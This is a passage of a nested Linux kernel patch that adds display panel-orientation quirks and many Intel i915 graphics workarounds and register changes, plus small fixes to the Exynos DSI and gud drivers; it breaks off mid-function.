+@@ -97,6 +91,12 @@ static const struct drm_dmi_panel_orientation_data lcd720x1280_rightside_up = {
+ 	.orientation = DRM_MODE_PANEL_ORIENTATION_RIGHT_UP,
+ };
+ 
++static const struct drm_dmi_panel_orientation_data lcd800x1280_leftside_up = {
++	.width = 800,
++	.height = 1280,
++	.orientation = DRM_MODE_PANEL_ORIENTATION_LEFT_UP,
++};
++
+ static const struct drm_dmi_panel_orientation_data lcd800x1280_rightside_up = {
+ 	.width = 800,
+ 	.height = 1280,
+@@ -127,6 +127,12 @@ static const struct drm_dmi_panel_orientation_data lcd1600x2560_leftside_up = {
+ 	.orientation = DRM_MODE_PANEL_ORIENTATION_LEFT_UP,
+ };
+ 
++static const struct drm_dmi_panel_orientation_data lcd1600x2560_rightside_up = {
++	.width = 1600,
++	.height = 2560,
++	.orientation = DRM_MODE_PANEL_ORIENTATION_RIGHT_UP,
++};
++
+ static const struct dmi_system_id orientation_data[] = {
+ 	{	/* Acer One 10 (S1003) */
+ 		.matches = {
+@@ -151,7 +157,7 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "T100HAN"),
+ 		},
+-		.driver_data = (void *)&asus_t100ha,
++		.driver_data = (void *)&lcd800x1280_leftside_up,
+ 	}, {	/* Asus T101HA */
+ 		.matches = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+@@ -196,6 +202,12 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "Hi10 pro tablet"),
+ 		},
+ 		.driver_data = (void *)&lcd1200x1920_rightside_up,
++	}, {	/* Dynabook K50 */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Dynabook Inc."),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_NAME, "dynabook K50/FR"),
++		},
++		.driver_data = (void *)&lcd800x1280_leftside_up,
+ 	}, {	/* GPD MicroPC (generic strings, also match on bios date) */
+ 		.matches = {
+ 		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "Default string"),
+@@ -310,6 +322,12 @@ static const struct dmi_system_id orientation_data[] = {
+ 		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "Lenovo ideapad D330-10IGL"),
+ 		},
+ 		.driver_data = (void *)&lcd800x1280_rightside_up,
++	}, {	/* Lenovo IdeaPad Duet 3 10IGL5 */
++		.matches = {
++		  DMI_EXACT_MATCH(DMI_SYS_VENDOR, "LENOVO"),
++		  DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "IdeaPad Duet 3 10IGL5"),
++		},
++		.driver_data = (void *)&lcd1200x1920_rightside_up,
+ 	}, {	/* Lenovo Yoga Book X90F / X91F / X91L */
+ 		.matches = {
+ 		  /* Non exact match to match all versions */
+@@ -331,6 +349,13 @@ static const struct dmi_system_id orientation_data[] = {
+ 		 DMI_MATCH(DMI_BIOS_VERSION, "BLADE_21"),
+ 		},
+ 		.driver_data = (void *)&lcd1200x1920_rightside_up,
++	}, {	/* Lenovo Yoga Tab 3 X90F */
++		.matches = {
++		 DMI_MATCH(DMI_SYS_VENDOR, "Intel Corporation"),
++		 DMI_MATCH(DMI_PRODUCT_NAME, "CHERRYVIEW D1 PLATFORM"),
++		 DMI_MATCH(DMI_PRODUCT_VERSION, "Blade3-10A-001"),
++		},
++		.driver_data = (void *)&lcd1600x2560_rightside_up,
+ 	}, {	/* Nanote UMPC-01 */
+ 		.matches = {
+ 		 DMI_MATCH(DMI_SYS_VENDOR, "RWC CO.,LTD"),
+diff --git a/drivers/gpu/drm/exynos/exynos_drm_dsi.c b/drivers/gpu/drm/exynos/exynos_drm_dsi.c
+index ec673223d6b7a..b5305b145ddbd 100644
+--- a/drivers/gpu/drm/exynos/exynos_drm_dsi.c
++++ b/drivers/gpu/drm/exynos/exynos_drm_dsi.c
+@@ -805,15 +805,15 @@ static int exynos_dsi_init_link(struct exynos_dsi *dsi)
+ 			reg |= DSIM_AUTO_MODE;
+ 		if (dsi->mode_flags & MIPI_DSI_MODE_VIDEO_HSE)
+ 			reg |= DSIM_HSE_MODE;
+-		if (!(dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HFP))
++		if (dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HFP)
+ 			reg |= DSIM_HFP_MODE;
+-		if (!(dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HBP))
++		if (dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HBP)
+ 			reg |= DSIM_HBP_MODE;
+-		if (!(dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HSA))
++		if (dsi->mode_flags & MIPI_DSI_MODE_VIDEO_NO_HSA)
+ 			reg |= DSIM_HSA_MODE;
+ 	}
+ 
+-	if (!(dsi->mode_flags & MIPI_DSI_MODE_NO_EOT_PACKET))
++	if (dsi->mode_flags & MIPI_DSI_MODE_NO_EOT_PACKET)
+ 		reg |= DSIM_EOT_DISABLE;
+ 
+ 	switch (dsi->format) {
+diff --git a/drivers/gpu/drm/gud/gud_pipe.c b/drivers/gpu/drm/gud/gud_pipe.c
+index 7c6dc2bcd14a6..61f4abaf1811f 100644
+--- a/drivers/gpu/drm/gud/gud_pipe.c
++++ b/drivers/gpu/drm/gud/gud_pipe.c
+@@ -157,8 +157,8 @@ static int gud_prep_flush(struct gud_device *gdrm, struct drm_framebuffer *fb,
+ {
+ 	struct dma_buf_attachment *import_attach = fb->obj[0]->import_attach;
+ 	u8 compression = gdrm->compression;
+-	struct iosys_map map[DRM_FORMAT_MAX_PLANES];
+-	struct iosys_map map_data[DRM_FORMAT_MAX_PLANES];
++	struct iosys_map map[DRM_FORMAT_MAX_PLANES] = { };
++	struct iosys_map map_data[DRM_FORMAT_MAX_PLANES] = { };
+ 	struct iosys_map dst;
+ 	void *vaddr, *buf;
+ 	size_t pitch, len;
+diff --git a/drivers/gpu/drm/i915/display/intel_quirks.c b/drivers/gpu/drm/i915/display/intel_quirks.c
+index 6e48d3bcdfec5..a280448df771a 100644
+--- a/drivers/gpu/drm/i915/display/intel_quirks.c
++++ b/drivers/gpu/drm/i915/display/intel_quirks.c
+@@ -199,6 +199,8 @@ static struct intel_quirk intel_quirks[] = {
+ 	/* ECS Liva Q2 */
+ 	{ 0x3185, 0x1019, 0xa94d, quirk_increase_ddi_disabled_time },
+ 	{ 0x3184, 0x1019, 0xa94d, quirk_increase_ddi_disabled_time },
++	/* HP Notebook - 14-r206nv */
++	{ 0x0f31, 0x103c, 0x220f, quirk_invert_brightness },
+ };
+ 
+ void intel_init_quirks(struct drm_i915_private *i915)
+diff --git a/drivers/gpu/drm/i915/gt/intel_engine_cs.c b/drivers/gpu/drm/i915/gt/intel_engine_cs.c
+index d37931e16fd9b..34b0a9dadce4f 100644
+--- a/drivers/gpu/drm/i915/gt/intel_engine_cs.c
++++ b/drivers/gpu/drm/i915/gt/intel_engine_cs.c
+@@ -1476,10 +1476,12 @@ static int __intel_engine_stop_cs(struct intel_engine_cs *engine,
+ 	intel_uncore_write_fw(uncore, mode, _MASKED_BIT_ENABLE(STOP_RING));
+ 
+ 	/*
+-	 * Wa_22011802037 : gen11, gen12, Prior to doing a reset, ensure CS is
++	 * Wa_22011802037: Prior to doing a reset, ensure CS is
+ 	 * stopped, set ring stop bit and prefetch disable bit to halt CS
+ 	 */
+-	if (IS_GRAPHICS_VER(engine->i915, 11, 12))
++	if (IS_MTL_GRAPHICS_STEP(engine->i915, M, STEP_A0, STEP_B0) ||
++	    (GRAPHICS_VER(engine->i915) >= 11 &&
++	    GRAPHICS_VER_FULL(engine->i915) < IP_VER(12, 70)))
+ 		intel_uncore_write_fw(uncore, RING_MODE_GEN7(engine->mmio_base),
+ 				      _MASKED_BIT_ENABLE(GEN12_GFX_PREFETCH_DISABLE));
+ 
+diff --git a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+index 21cb5b69d82eb..3c573d41d4046 100644
+--- a/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
++++ b/drivers/gpu/drm/i915/gt/intel_execlists_submission.c
+@@ -2989,10 +2989,12 @@ static void execlists_reset_prepare(struct intel_engine_cs *engine)
+ 	intel_engine_stop_cs(engine);
+ 
+ 	/*
+-	 * Wa_22011802037:gen11/gen12: In addition to stopping the cs, we need
++	 * Wa_22011802037: In addition to stopping the cs, we need
+ 	 * to wait for any pending mi force wakeups
+ 	 */
+-	if (IS_GRAPHICS_VER(engine->i915, 11, 12))
++	if (IS_MTL_GRAPHICS_STEP(engine->i915, M, STEP_A0, STEP_B0) ||
++	    (GRAPHICS_VER(engine->i915) >= 11 &&
++	    GRAPHICS_VER_FULL(engine->i915) < IP_VER(12, 70)))
+ 		intel_engine_wait_for_pending_mi_fw(engine);
+ 
+ 	engine->execlists.reset_ccid = active_ccid(engine);
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_mcr.c b/drivers/gpu/drm/i915/gt/intel_gt_mcr.c
+index ea86c1ab5dc56..58ea3325bbdaa 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_mcr.c
++++ b/drivers/gpu/drm/i915/gt/intel_gt_mcr.c
+@@ -162,8 +162,15 @@ void intel_gt_mcr_init(struct intel_gt *gt)
+ 	if (MEDIA_VER(i915) >= 13 && gt->type == GT_MEDIA) {
+ 		gt->steering_table[OADDRM] = xelpmp_oaddrm_steering_table;
+ 	} else if (GRAPHICS_VER_FULL(i915) >= IP_VER(12, 70)) {
+-		fuse = REG_FIELD_GET(GT_L3_EXC_MASK,
+-				     intel_uncore_read(gt->uncore, XEHP_FUSE4));
++		/* Wa_14016747170 */
++		if (IS_MTL_GRAPHICS_STEP(i915, M, STEP_A0, STEP_B0) ||
++		    IS_MTL_GRAPHICS_STEP(i915, P, STEP_A0, STEP_B0))
++			fuse = REG_FIELD_GET(MTL_GT_L3_EXC_MASK,
++					     intel_uncore_read(gt->uncore,
++							       MTL_GT_ACTIVITY_FACTOR));
++		else
++			fuse = REG_FIELD_GET(GT_L3_EXC_MASK,
++					     intel_uncore_read(gt->uncore, XEHP_FUSE4));
+ 
+ 		/*
+ 		 * Despite the register field being named "exclude mask" the
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt_regs.h b/drivers/gpu/drm/i915/gt/intel_gt_regs.h
+index a5454af2a9cfd..9758b0b635601 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt_regs.h
++++ b/drivers/gpu/drm/i915/gt/intel_gt_regs.h
+@@ -413,6 +413,7 @@
+ #define   TBIMR_FAST_CLIP			REG_BIT(5)
+ 
+ #define VFLSKPD					MCR_REG(0x62a8)
++#define   VF_PREFETCH_TLB_DIS			REG_BIT(5)
+ #define   DIS_OVER_FETCH_CACHE			REG_BIT(1)
+ #define   DIS_MULT_MISS_RD_SQUASH		REG_BIT(0)
+ 
+@@ -680,10 +681,7 @@
+ #define GEN6_RSTCTL				_MMIO(0x9420)
+ 
+ #define GEN7_MISCCPCTL				_MMIO(0x9424)
+-#define   GEN7_DOP_CLOCK_GATE_ENABLE		(1 << 0)
+-
+-#define GEN8_MISCCPCTL				MCR_REG(0x9424)
+-#define   GEN8_DOP_CLOCK_GATE_ENABLE		REG_BIT(0)
++#define   GEN7_DOP_CLOCK_GATE_ENABLE		REG_BIT(0)
+ #define   GEN12_DOP_CLOCK_GATE_RENDER_ENABLE	REG_BIT(1)
+ #define   GEN8_DOP_CLOCK_GATE_CFCLK_ENABLE	(1 << 2)
+ #define   GEN8_DOP_CLOCK_GATE_GUC_ENABLE	(1 << 4)
+@@ -968,7 +966,8 @@
+ #define   GEN7_WA_FOR_GEN7_L3_CONTROL		0x3C47FF8C
+ #define   GEN7_L3AGDIS				(1 << 19)
+ 
+-#define XEHPC_LNCFMISCCFGREG0			_MMIO(0xb01c)
++#define XEHPC_LNCFMISCCFGREG0			MCR_REG(0xb01c)
++#define   XEHPC_HOSTCACHEEN			REG_BIT(1)
+ #define   XEHPC_OVRLSCCC			REG_BIT(0)
+ 
+ #define GEN7_L3CNTLREG2				_MMIO(0xb020)
+@@ -1030,7 +1029,7 @@
+ #define XEHP_L3SCQREG7				MCR_REG(0xb188)
+ #define   BLEND_FILL_CACHING_OPT_DIS		REG_BIT(3)
+ 
+-#define XEHPC_L3SCRUB				_MMIO(0xb18c)
++#define XEHPC_L3SCRUB				MCR_REG(0xb18c)
+ #define   SCRUB_CL_DWNGRADE_SHARED		REG_BIT(12)
+ #define   SCRUB_RATE_PER_BANK_MASK		REG_GENMASK(2, 0)
+ #define   SCRUB_RATE_4B_PER_CLK			REG_FIELD_PREP(SCRUB_RATE_PER_BANK_MASK, 0x6)
+@@ -1088,16 +1087,19 @@
+ #define XEHP_MERT_MOD_CTRL			MCR_REG(0xcf28)
+ #define RENDER_MOD_CTRL				MCR_REG(0xcf2c)
+ #define COMP_MOD_CTRL				MCR_REG(0xcf30)
+-#define VDBX_MOD_CTRL				MCR_REG(0xcf34)
+-#define VEBX_MOD_CTRL				MCR_REG(0xcf38)
++#define XELPMP_GSC_MOD_CTRL			_MMIO(0xcf30)	/* media GT only */
++#define XEHP_VDBX_MOD_CTRL			MCR_REG(0xcf34)
++#define XELPMP_VDBX_MOD_CTRL			_MMIO(0xcf34)
++#define XEHP_VEBX_MOD_CTRL			MCR_REG(0xcf38)
++#define XELPMP_VEBX_MOD_CTRL			_MMIO(0xcf38)
+ #define   FORCE_MISS_FTLB			REG_BIT(3)
+ 
+-#define GEN12_GAMSTLB_CTRL			_MMIO(0xcf4c)
++#define XEHP_GAMSTLB_CTRL			MCR_REG(0xcf4c)
+ #define   CONTROL_BLOCK_CLKGATE_DIS		REG_BIT(12)
+ #define   EGRESS_BLOCK_CLKGATE_DIS		REG_BIT(11)
+ #define   TAG_BLOCK_CLKGATE_DIS			REG_BIT(7)
+ 
+-#define GEN12_GAMCNTRL_CTRL			_MMIO(0xcf54)
++#define XEHP_GAMCNTRL_CTRL			MCR_REG(0xcf54)
+ #define   INVALIDATION_BROADCAST_MODE_DIS	REG_BIT(12)
+ #define   GLOBAL_INVALIDATION_MODE		REG_BIT(2)
+ 
+@@ -1528,6 +1530,9 @@
+ 
+ #define MTL_MEDIA_MC6				_MMIO(0x138048)
+ 
++#define MTL_GT_ACTIVITY_FACTOR			_MMIO(0x138010)
++#define   MTL_GT_L3_EXC_MASK			REG_GENMASK(5, 3)
++
+ #define GEN6_GT_THREAD_STATUS_REG		_MMIO(0x13805c)
+ #define   GEN6_GT_THREAD_STATUS_CORE_MASK	0x7
+ 
+diff --git a/drivers/gpu/drm/i915/gt/intel_ring.c b/drivers/gpu/drm/i915/gt/intel_ring.c
+index 15ec64d881c44..fb99143be98e7 100644
+--- a/drivers/gpu/drm/i915/gt/intel_ring.c
++++ b/drivers/gpu/drm/i915/gt/intel_ring.c
+@@ -53,7 +53,7 @@ int intel_ring_pin(struct intel_ring *ring, struct i915_gem_ww_ctx *ww)
+ 	if (unlikely(ret))
+ 		goto err_unpin;
+ 
+-	if (i915_vma_is_map_and_fenceable(vma)) {
++	if (i915_vma_is_map_and_fenceable(vma) && !HAS_LLC(vma->vm->i915)) {
+ 		addr = (void __force *)i915_vma_pin_iomap(vma);
+ 	} else {
+ 		int type = i915_coherent_map_type(vma->vm->i915, vma->obj, false);
+@@ -98,7 +98,7 @@ void intel_ring_unpin(struct intel_ring *ring)
+ 		return;
+ 
+ 	i915_vma_unset_ggtt_write(vma);
+-	if (i915_vma_is_map_and_fenceable(vma))
++	if (i915_vma_is_map_and_fenceable(vma) && !HAS_LLC(vma->vm->i915))
+ 		i915_vma_unpin_iomap(vma);
+ 	else
+ 		i915_gem_object_unpin_map(vma->obj);
+@@ -116,7 +116,7 @@ static struct i915_vma *create_ring_vma(struct i915_ggtt *ggtt, int size)
+ 
+ 	obj = i915_gem_object_create_lmem(i915, size, I915_BO_ALLOC_VOLATILE |
+ 					  I915_BO_ALLOC_PM_VOLATILE);
+-	if (IS_ERR(obj) && i915_ggtt_has_aperture(ggtt))
++	if (IS_ERR(obj) && i915_ggtt_has_aperture(ggtt) && !HAS_LLC(i915))
+ 		obj = i915_gem_object_create_stolen(i915, size);
+ 	if (IS_ERR(obj))
+ 		obj = i915_gem_object_create_internal(i915, size);
+diff --git a/drivers/gpu/drm/i915/gt/intel_workarounds.c b/drivers/gpu/drm/i915/gt/intel_workarounds.c
+index a0740308555d8..e13052c5dae19 100644
+--- a/drivers/gpu/drm/i915/gt/intel_workarounds.c
++++ b/drivers/gpu/drm/i915/gt/intel_workarounds.c
+@@ -224,6 +224,12 @@ wa_write(struct i915_wa_list *wal, i915_reg_t reg, u32 set)
+ 	wa_write_clr_set(wal, reg, ~0, set);
+ }
+ 
++static void
++wa_mcr_write(struct i915_wa_list *wal, i915_mcr_reg_t reg, u32 set)
++{
++	wa_mcr_write_clr_set(wal, reg, ~0, set);
++}
++
+ static void
+ wa_write_or(struct i915_wa_list *wal, i915_reg_t reg, u32 set)
+ {
+@@ -786,6 +792,32 @@ static void dg2_ctx_workarounds_init(struct intel_engine_cs *engine,
+ 	wa_masked_en(wal, CACHE_MODE_1, MSAA_OPTIMIZATION_REDUC_DISABLE);
+ }
+ 
++static void mtl_ctx_workarounds_init(struct intel_engine_cs *engine,
++				     struct i915_wa_list *wal)
++{
++	struct drm_i915_private *i915 = engine->i915;
++
++	if (IS_MTL_GRAPHICS_STEP(i915, M, STEP_A0, STEP_B0) ||
++	    IS_MTL_GRAPHICS_STEP(i915, P, STEP_A0, STEP_B0)) {
++		/* Wa_14014947963 */
++		wa_masked_field_set(wal, VF_PREEMPTION,
++				    PREEMPTION_VERTEX_COUNT, 0x4000);
++
++		/* Wa_16013271637 */
++		wa_mcr_masked_en(wal, XEHP_SLICE_COMMON_ECO_CHICKEN1,
++				 MSC_MSAA_REODER_BUF_BYPASS_DISABLE);
++
++		/* Wa_18019627453 */
++		wa_mcr_masked_en(wal, VFLSKPD, VF_PREFETCH_TLB_DIS);
++
++		/* Wa_18018764978 */
++		wa_masked_en(wal, PSS_MODE2, SCOREBOARD_STALL_FLUSH_CONTROL);
++	}
++
++	/* Wa_18019271663 */
++	wa_masked_en(wal, CACHE_MODE_1, MSAA_OPTIMIZATION_REDUC_DISABLE);
++}
++
+ static void fakewa_disable_nestedbb_mode(struct intel_engine_cs *engine,
+ 					 struct i915_wa_list *wal)
+ {
+@@ -872,7 +904,9 @@ __intel_engine_init_ctx_wa(struct intel_engine_cs *engine,
+ 	if (engine->class != RENDER_CLASS)
+ 		goto done;
+ 
+-	if (IS_PONTEVECCHIO(i915))
++	if (IS_METEORLAKE(i915))
++		mtl_ctx_workarounds_init(engine, wal);
++	else if (IS_PONTEVECCHIO(i915))
+ 		; /* noop; none at this time */
+ 	else if (IS_DG2(i915))
+ 		dg2_ctx_workarounds_init(engine, wal);
+@@ -1522,6 +1556,13 @@ xehpsdv_gt_workarounds_init(struct intel_gt *gt, struct i915_wa_list *wal)
+ 
+ 	/* Wa_14011060649:xehpsdv */
+ 	wa_14011060649(gt, wal);
++
++	/* Wa_14012362059:xehpsdv */
++	wa_mcr_write_or(wal, XEHP_MERT_MOD_CTRL, FORCE_MISS_FTLB);
++
++	/* Wa_14014368820:xehpsdv */
++	wa_mcr_write_or(wal, XEHP_GAMCNTRL_CTRL,
++			INVALIDATION_BROADCAST_MODE_DIS | GLOBAL_INVALIDATION_MODE);
+ }
+ 
+ static void
+@@ -1562,6 +1603,12 @@ dg2_gt_workarounds_init(struct intel_gt *gt, struct i915_wa_list *wal)
+ 				DSS_ROUTER_CLKGATE_DIS);
+ 	}
+ 
++	if (IS_DG2_GRAPHICS_STEP(gt->i915, G10, STEP_A0, STEP_B0) ||
++	    IS_DG2_GRAPHICS_STEP(gt->i915, G11, STEP_A0, STEP_B0)) {
++		/* Wa_14012362059:dg2 */
++		wa_mcr_write_or(wal, XEHP_MERT_MOD_CTRL, FORCE_MISS_FTLB);
++	}
++
+ 	if (IS_DG2_GRAPHICS_STEP(gt->i915, G10, STEP_A0, STEP_B0)) {
+ 		/* Wa_14010948348:dg2_g10 */
+ 		wa_write_or(wal, UNSLCGCTL9430, MSQDUNIT_CLKGATE_DIS);
+@@ -1607,6 +1654,12 @@ dg2_gt_workarounds_init(struct intel_gt *gt, struct i915_wa_list *wal)
+ 
+ 		/* Wa_14011028019:dg2_g10 */
+ 		wa_mcr_write_or(wal, SSMCGCTL9530, RTFUNIT_CLKGATE_DIS);
++
++		/* Wa_14010680813:dg2_g10 */
++		wa_mcr_write_or(wal, XEHP_GAMSTLB_CTRL,
++				CONTROL_BLOCK_CLKGATE_DIS |
++				EGRESS_BLOCK_CLKGATE_DIS |
++				TAG_BLOCK_CLKGATE_DIS);
+ 	}
+ 
+ 	/* Wa_14014830051:dg2 */
+@@ -1620,7 +1673,17 @@ dg2_gt_workarounds_init(struct intel_gt *gt, struct i915_wa_list *wal)
+ 	wa_mcr_write_or(wal, XEHP_SQCM, EN_32B_ACCESS);
+ 
+ 	/* Wa_14015795083 */
+-	wa_mcr_write_clr(wal, GEN8_MISCCPCTL, GEN12_DOP_CLOCK_GATE_RENDER_ENABLE);
++	wa_write_clr(wal, GEN7_MISCCPCTL, GEN12_DOP_CLOCK_GATE_RENDER_ENABLE);
++
++	/* Wa_18018781329 */
++	wa_mcr_write_or(wal, RENDER_MOD_CTRL, FORCE_MISS_FTLB);
++	wa_mcr_write_or(wal, COMP_MOD_CTRL, FORCE_MISS_FTLB);
++	wa_mcr_write_or(wal, XEHP_VDBX_MOD_CTRL, FORCE_MISS_FTLB);
++	wa_mcr_write_or(wal, XEHP_VEBX_MOD_CTRL, FORCE_MISS_FTLB);
++
++	/* Wa_1509235366:dg2 */
++	wa_mcr_write_or(wal, XEHP_GAMCNTRL_CTRL,
++			INVALIDATION_BROADCAST_MODE_DIS | GLOBAL_INVALIDATION_MODE);
+ }
+ 
+ static void
+@@ -1629,13 +1692,27 @@ pvc_gt_workarounds_init(struct intel_gt *gt, struct i915_wa_list *wal)
+ 	pvc_init_mcr(gt, wal);
+ 
+ 	/* Wa_14015795083 */
+-	wa_mcr_write_clr(wal, GEN8_MISCCPCTL, GEN12_DOP_CLOCK_GATE_RENDER_ENABLE);
++	wa_write_clr(wal, GEN7_MISCCPCTL, GEN12_DOP_CLOCK_GATE_RENDER_ENABLE);
++
++	/* Wa_18018781329 */
++	wa_mcr_write_or(wal, RENDER_MOD_CTRL, FORCE_MISS_FTLB);
++	wa_mcr_write_or(wal, COMP_MOD_CTRL, FORCE_MISS_FTLB);
++	wa_mcr_write_or(wal, XEHP_VDBX_MOD_CTRL, FORCE_MISS_FTLB);
++	wa_mcr_write_or(wal, XEHP_VEBX_MOD_CTRL, FORCE_MISS_FTLB);
+ }
+ 
+ static void
+ xelpg_gt_workarounds_init(struct intel_gt *gt, struct i915_wa_list *wal)
+ {
+-	/* FIXME: Actual workarounds will be added in future patch(es) */
++	if (IS_MTL_GRAPHICS_STEP(gt->i915, M, STEP_A0, STEP_B0) ||
++	    IS_MTL_GRAPHICS_STEP(gt->i915, P, STEP_A0, STEP_B0)) {
++		/* Wa_14014830051 */
++		wa_mcr_write_clr(wal, SARB_CHICKEN1, COMP_CKN_IN);
++
++		/* Wa_18018781329 */
++		wa_mcr_write_or(wal, RENDER_MOD_CTRL, FORCE_MISS_FTLB);
++		wa_mcr_write_or(wal, COMP_MOD_CTRL, FORCE_MISS_FTLB);
++	}
+ 
+ 	/*
+ 	 * Unlike older platforms, we no longer setup implicit steering here;
+@@ -1647,7 +1724,17 @@ xelpg_gt_workarounds_init(struct intel_gt *gt, struct i915_wa_list *wal)
+ static void
+ xelpmp_gt_workarounds_init(struct intel_gt *gt, struct i915_wa_list *wal)
+ {
+-	/* FIXME: Actual workarounds will be added in future patch(es) */
++	if (IS_MTL_MEDIA_STEP(gt->i915, STEP_A0, STEP_B0)) {
++		/*
++		 * Wa_18018781329
++		 *
++		 * Note that although these registers are MCR on the primary
++		 * GT, the media GT's versions are regular singleton registers.
++		 */
++		wa_write_or(wal, XELPMP_GSC_MOD_CTRL, FORCE_MISS_FTLB);
++		wa_write_or(wal, XELPMP_VDBX_MOD_CTRL, FORCE_MISS_FTLB);
++		wa_write_or(wal, XELPMP_VEBX_MOD_CTRL, FORCE_MISS_FTLB);
++	}
+ 
+ 	debug_dump_steering(gt);
+ }
+@@ -2171,7 +2258,9 @@ void intel_engine_init_whitelist(struct intel_engine_cs *engine)
+ 
+ 	wa_init_start(w, engine->gt, "whitelist", engine->name);
+ 
+-	if (IS_PONTEVECCHIO(i915))
++	if (IS_METEORLAKE(i915))
++		; /* noop; none at this time */
++	else if (IS_PONTEVECCHIO(i915))
+ 		pvc_whitelist_build(engine);
+ 	else if (IS_DG2(i915))
+ 		dg2_whitelist_build(engine);
+@@ -2281,22 +2370,37 @@ rcs_engine_wa_init(struct intel_engine_cs *engine, struct i915_wa_list *wal)
+ {
+ 	struct drm_i915_private *i915 = engine->i915;
+ 
+-	if (IS_DG2(i915)) {
+-		/* Wa_1509235366:dg2 */
+-		wa_write_or(wal, GEN12_GAMCNTRL_CTRL, INVALIDATION_BROADCAST_MODE_DIS |
+-			    GLOBAL_INVALIDATION_MODE);
+-	}
+-
+-	if (IS_DG2_GRAPHICS_STEP(i915, G11, STEP_A0, STEP_B0)) {
+-		/* Wa_14013392000:dg2_g11 */
+-		wa_mcr_masked_en(wal, GEN8_ROW_CHICKEN2, GEN12_ENABLE_LARGE_GRF_MODE);
++	if (IS_MTL_GRAPHICS_STEP(i915, M, STEP_A0, STEP_B0) ||
++	    IS_MTL_GRAPHICS_STEP(i915, P, STEP_A0, STEP_B0)) {
++		/* Wa_22014600077 */
++		wa_mcr_masked_en(wal, GEN10_CACHE_MODE_SS,
++				 ENABLE_EU_COUNT_FOR_TDL_FLUSH);
+ 	}
+ 
+-	if (IS_DG2_GRAPHICS_STEP(i915, G10, STEP_B0, STEP_FOREVER) ||
++	if (IS_MTL_GRAPHICS_STEP(i915, M, STEP_A0, STEP_B0) ||
++	    IS_MTL_GRAPHICS_STEP(i915, P, STEP_A0, STEP_B0) ||
++	    IS_DG2_GRAPHICS_STEP(i915, G10, STEP_B0, STEP_FOREVER) ||
+ 	    IS_DG2_G11(i915) || IS_DG2_G12(i915)) {
+-		/* Wa_1509727124:dg2 */
++		/* Wa_1509727124 */
+ 		wa_mcr_masked_en(wal, GEN10_SAMPLER_MODE,
+ 				 SC_DISABLE_POWER_OPTIMIZATION_EBB);
++
++		/* Wa_22013037850 */
++		wa_mcr_write_or(wal, LSC_CHICKEN_BIT_0_UDW,
++				DISABLE_128B_EVICTION_COMMAND_UDW);
++	}
++
++	if (IS_DG2_GRAPHICS_STEP(i915, G10, STEP_B0, STEP_FOREVER) ||
++	    IS_DG2_G11(i915) || IS_DG2_G12(i915) ||
++	    IS_MTL_GRAPHICS_STEP(i915, M, STEP_A0, STEP_B0)) {
++		/* Wa_22012856258 */
++		wa_mcr_masked_en(wal, GEN8_ROW_CHICKEN2,
++				 GEN12_DISABLE_READ_SUPPRESSION);
++	}
++
++	if (IS_DG2_GRAPHICS_STEP(i915, G11, STEP_A0, STEP_B0)) {
++		/* Wa_14013392000:dg2_g11 */
++		wa_mcr_masked_en(wal, GEN8_ROW_CHICKEN2, GEN12_ENABLE_LARGE_GRF_MODE);
+ 	}
+ 
+ 	if (IS_DG2_GRAPHICS_STEP(i915, G10, STEP_A0, STEP_B0) ||
+@@ -2330,14 +2434,6 @@ rcs_engine_wa_init(struct intel_engine_cs *engine, struct i915_wa_list *wal)
+ 
+ 	if (IS_DG2_GRAPHICS_STEP(i915, G10, STEP_B0, STEP_FOREVER) ||
+ 	    IS_DG2_G11(i915) || IS_DG2_G12(i915)) {
+-		/* Wa_22013037850:dg2 */
+-		wa_mcr_write_or(wal, LSC_CHICKEN_BIT_0_UDW,
+-				DISABLE_128B_EVICTION_COMMAND_UDW);
+-
+-		/* Wa_22012856258:dg2 */
+-		wa_mcr_masked_en(wal, GEN8_ROW_CHICKEN2,
+-				 GEN12_DISABLE_READ_SUPPRESSION);
+-
+ 		/*
+ 		 * Wa_22010960976:dg2
+ 		 * Wa_14013347512:dg2
+@@ -2386,18 +2482,6 @@ rcs_engine_wa_init(struct intel_engine_cs *engine, struct i915_wa_list *wal)
+ 		wa_mcr_masked_en(wal, GEN9_HALF_SLICE_CHICKEN7,
+ 				 DG2_DISABLE_ROUND_ENABLE_ALLOW_FOR_SSLA);
+ 
+-	if (IS_DG2_GRAPHICS_STEP(engine->i915, G10, STEP_A0, STEP_B0)) {
+-		/* Wa_14010680813:dg2_g10 */
+-		wa_write_or(wal, GEN12_GAMSTLB_CTRL, CONTROL_BLOCK_CLKGATE_DIS |
+-			    EGRESS_BLOCK_CLKGATE_DIS | TAG_BLOCK_CLKGATE_DIS);
+-	}
+-
+-	if (IS_DG2_GRAPHICS_STEP(engine->i915, G10, STEP_A0, STEP_B0) ||
+-	    IS_DG2_GRAPHICS_STEP(engine->i915, G11, STEP_A0, STEP_B0)) {
+-		/* Wa_14012362059:dg2 */
+-		wa_mcr_write_or(wal, XEHP_MERT_MOD_CTRL, FORCE_MISS_FTLB);
+-	}
+-
+ 	if (IS_DG2_GRAPHICS_STEP(i915, G11, STEP_B0, STEP_FOREVER) ||
+ 	    IS_DG2_G10(i915)) {
+ 		/* Wa_22014600077:dg2 */
+@@ -2901,8 +2985,9 @@ add_render_compute_tuning_settings(struct drm_i915_private *i915,
+ 				   struct i915_wa_list *wal)
+ {
